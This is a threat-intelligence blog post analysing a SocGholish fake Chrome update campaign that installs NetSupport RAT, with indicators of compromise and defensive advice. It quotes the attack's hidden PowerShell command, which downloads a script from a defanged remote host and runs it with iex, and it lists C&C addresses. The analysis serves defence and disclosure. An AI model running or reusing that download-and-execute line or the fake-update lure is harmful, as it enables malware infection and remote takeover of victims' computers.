Cyble-Blogs-SocGholish

NetSupport RAT Distributed Via SocGholish

New Drive-by Download Campaign Spying on Users

SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.

This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.

Threat Actors (TAs) host a malicious website (the site displays content to lure end-users with critical browser updates) that implements a drive-by-download mechanism, such as JavaScript code or Uniform Resource Locator (URL) redirections, to download an archive file that contains malware.

Being infected with SocGholish may result in the deployment of malware such as Cobalt Strike framework, ransomware, Information Stealers, RATs, etc.

The below figure depicts the infection chain used by the SocGholish framework.

Figure 1 – Infection chain of SocGholish

Figure 1 – Infection chain of SocGholish

Technical Analysis

The infection chain begins once a user visits a compromised website that contains an injected HTML code which redirects them to a fake Chrome browser page to lure them into updating their Chrome application.

Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder.

The below figure shows a fake Chrome browser update page and the downloaded zip archive file.

Figure 2 – Fake update page of Chrome browser

The downloaded zip archive file contains a heavily-obfuscated JavaScript file named “AutoUpdater.js” as shown below.

Figure 3 – Obfuscated JavaScript file

Upon execution of the JavaScript file, it further launches a PowerShell command to download and execute an additional PowerShell script from the remote server.

The JavaScript uses following PowerShell command to download a new PowerShell script and invokes it using Invoke-Expression (iex).

  • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”

The new PowerShell script contains Base64-encoded streams which are decoded using [System.Convert]::FromBase64String method, and then performs gzip decompression operation using the [System.IO.Compression.CompressionMode]::Decompress method as shown below.

Figure 4 – PowerShell Script to drop NetSupport RAT

This decompressed Base64-decoded data contains the embedded payloads and contains code to drop the “NetSupport RAT” application named “whost.exe” with its supporting files saved under the %Appdata% directory, after which “whost.exe” is executed. The below figure shows the NetSupport client application along with its associated files.

Figure 5 – NetSupport RAT malware package dropped under the %AppData% directory

After dropping the payload, the PowerShell script creates a run entry to ensure the executable “whost.exe” starts whenever the user logs onto the machine.

The below figure shows the registry key created to establish persistence of the NetSupport client “whost.exe”.

Figure 6 – Registry key created to established persistence

NetSupport Manager RAT

NetSupport Manager is a commercially available RAT (Remote Administration Tool), typically used for legitimate reasons that gives administrators remote access to user’s computers. However, the legitimate application can also be abused by TAs to gain unauthorized access to compromised systems.

Upon execution of the “NetSupport RAT”, it attempts to identify the victim’s geo-location by contacting the following URL:

  • hxxp://geo.netsupportsoftware[.]com/location/loca[.]asp

We also observed that the installed RAT sends victim information in an encrypted format with POST requests to the following Command-and-Control server URL:

  • hxxp://149.248.8[.]148/fakeurl[.]htm

The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.

Figure 7 – Post-Infection C&C Traffic of NetSupport RAT

After compromising a victim machine, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.

Conclusion

Threat Actors use various techniques to deploy their malicious payloads into victim systems. Over the course of our research, we observed that TAs using Fake Browser Update (SocGholish) to deliver the NetSupport RAT.

While downloading files from internet, users should confirm whether the downloaded content originated from a legitimate source and not from any suspicious sites. Software applications such as web browsers will typically notify users about updates within the application itself and avoid updates via any third-party websites.

Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keep our readers updated with our latest findings.

Our Recommendations

  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.
  • Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
  • Avoid downloading files from unknown websites.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Block URLs that could spread the malware, e.g., Torrent/Warez.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

MITRE ATT&CK® Techniques 

TacticTechnique IDTechnique Name
Initial AccessT1189Drive-by Compromise
ExecutionT1204
T1059
T1059
User Execution
JavaScript
PowerShell
PersistenceT1547Registry Run Keys / Startup Folder
Privilege EscalationT1574
T1055
DLL Side-Loading
Process Injection
Defence EvasionT1027
T1497
T1140
Obfuscated Files or Information
Virtualization/Sandbox Evasion
Deobfuscate/Decode Files or Information
DiscoveryT1082System Information Discovery
Command and ControlT1219
T1105
Remote Access Software
Ingress Tool Transfer

Indicators of Compromise (IOCs) 

IndicatorsIndicator
Type
Description
d5812e63327b5f5491c1a55c74737540
0af611819cd098c1ff3942431fc327dc75b83344 bad65408eb581fe39ded2637473bd4458b03e183ecc03164d6f8cf683a3e408e
MD5
SHA1
Sha256
Archive file “Сhrome.Updаte.zip”
dc123142cb787d395814027ff4046842
f4aaa317e23fb5446fc29fdbabfa4f0fc7090f59
520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61
MD5
SHA1
Sha256
Archive file “Сhrome.Updаte.zip”
606df8a69873fcc00754a6bb245ab5ae
6842a4b32aa6a80c75bed4cdf09235c9a5f7e87b
6f0fac3b955e63f25bd199ec373c677152212fceda20d8bc6672cf62e68482e8
MD5
SHA1
Sha256
JavaScript file “AutoUpdater.js”
eca593e95d2e919fb4b5f55b62b663df
406d6f811df8c0f9a16a36117be6772f25fcb214
1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d
MD5
SHA1
Sha256
JavaScript file “AutoUpdater.js”
dad848c52d27ed20002825df023c4d7c
48e49867904d83b35361d6c5f809d16bc251f334
4a59ac7ae76abb86ab2e035adbe5253247a2aad9b1ce9f59b3145333e34c26f7
MD5
SHA1
Sha256
PS1 file
“15.ico.ps1”
252dce576f9fbb9aaa7114dd7150f320
c07f0a02c284b697dff119839f455836be39d10e
b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad
MD5
SHA1
Sha256
EXE file
“whost.exe”
hxxp://aeoi[.]pl/15.icoURLC&C server
hxxp://aeoi[.]pl/21.icoURLC&C server
149.248.8.148IPC&C server
94.158.247.32IPC&C server
Scroll to Top